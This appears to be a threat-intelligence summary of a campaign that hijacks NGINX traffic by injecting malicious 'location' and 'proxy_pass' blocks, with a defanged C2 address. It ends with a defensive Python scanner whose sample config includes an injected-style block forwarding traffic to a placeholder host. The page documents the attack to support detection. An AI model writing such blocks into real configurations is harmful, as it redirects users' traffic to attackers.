NGINX Server Traffic Hijacking Campaign
Summary
A threat actor is compromising NGINX servers to hijack and redirect user traffic through attacker-controlled infrastructure. The campaign targets NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains and government/educational sites. The attackers modify NGINX configuration files to inject malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to attacker-controlled domains. The attack uses a multi-stage toolkit to perform these injections, making the traffic appear legitimate by preserving request headers. The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files, which are rarely scrutinized. User traffic still reaches its intended destination, often directly, making the attack less noticeable without specific monitoring.
Timeline
- 05.02.2026 01:26 · 1 article
Threat Actor Compromises NGINX Servers to Hijack User Traffic
A threat actor is compromising NGINX servers to hijack and redirect user traffic through attacker-controlled infrastructure. The campaign targets NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains and government/educational sites. The attackers modify NGINX configuration files to inject malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to attacker-controlled domains. The attack uses a multi-stage toolkit to perform these injections, making the traffic appear legitimate by preserving request headers. The final stage of the toolkit scans compromised NGINX configurations to build a map of hijacked domains, injection templates, and proxy targets, exfiltrating the data to a command-and-control (C2) server at 158.94.210[.]227. The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files, which are rarely scrutinized.
- Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
Information Snippets
- NGINX is open-source software used for web traffic management, including web serving, load balancing, caching, and reverse proxying.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- The campaign targets NGINX installations and Baota hosting management panels, affecting sites with Asian top-level domains (.in, .id, .pe, .bd, .th) and government/educational sites (.edu, .gov).
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- Attackers inject malicious 'location' blocks into NGINX configuration files to capture and reroute incoming requests to attacker-controlled domains using the 'proxy_pass' directive.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- The attack uses a scripted multi-stage toolkit to perform the NGINX configuration injections, operating in five stages to ensure the injections are performed safely and without service downtime.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- The toolkit preserves request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' to make the traffic appear legitimate.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- The final stage of the toolkit scans compromised NGINX configurations to build a map of hijacked domains, injection templates, and proxy targets, exfiltrating the data to a command-and-control (C2) server at 158.94.210[.]227.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
- The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files.
  First reported: 05.02.2026 01:26 · 1 source, 1 article
  - Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26
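One defensive check that this snippet and the earlier 'location' injection snippet call for, added here as an example and not code from the article or from any tool it describes: a small Python scanner that walks an NGINX configuration, reports every location block whose proxy_pass target is neither a local address nor an upstream group defined in the same config, and lists which request headers that block forwards. The sample configuration, the upstream name and the .invalid hostname are constructed for the example.

```python
import re

# Constructed sample config (not from the article): one legitimate local
# backend plus one block shaped like the injection described above; the
# hostname is a placeholder standing in for the attacker-controlled domain.
SAMPLE_CONF = """
upstream app_backend { server 10.0.0.5:8080; }
server {
    listen 80;
    server_name example.test;
    location /api/ { proxy_pass http://app_backend; }
    location ~* ^/(search|news) {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
        proxy_pass http://hijack-placeholder.invalid;
    }
}
"""

LOCAL_HOSTS = {"127.0.0.1", "localhost", "unix"}  # assumed-benign proxy targets

def _block_body(text, open_idx):
    """Return the text between the '{' at open_idx and its matching '}'."""
    depth = 0
    for i in range(open_idx, len(text)):
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        if depth == 0:
            return text[open_idx + 1:i]
    return text[open_idx + 1:]  # unbalanced braces: take the remainder

def find_suspicious_locations(conf_text):
    """Return (location, target_host, forwarded_headers) for every location
    block whose proxy_pass target is neither local nor an upstream group
    defined in this config, i.e. a block that sends traffic off the server."""
    upstreams = set(re.findall(r"\bupstream\s+(\S+)\s*\{", conf_text))
    findings = []
    for m in re.finditer(r"\blocation\s+([^{]+)\{", conf_text):
        body = _block_body(conf_text, m.end() - 1)
        pp = re.search(r"\bproxy_pass\s+(\S+?)\s*;", body)
        if not pp:
            continue
        host = re.sub(r"^\w+://", "", pp.group(1)).split("/")[0].split(":")[0]
        if host in LOCAL_HOSTS or host in upstreams or host.startswith("$"):
            continue
        headers = re.findall(r"\bproxy_set_header\s+(\S+)", body)
        findings.append((m.group(1).strip(), host, headers))
    return findings
```

On a real host, run it over every file under /etc/nginx and the hosting panel's own vhost directory, and compare anything it reports against the backends you actually operate.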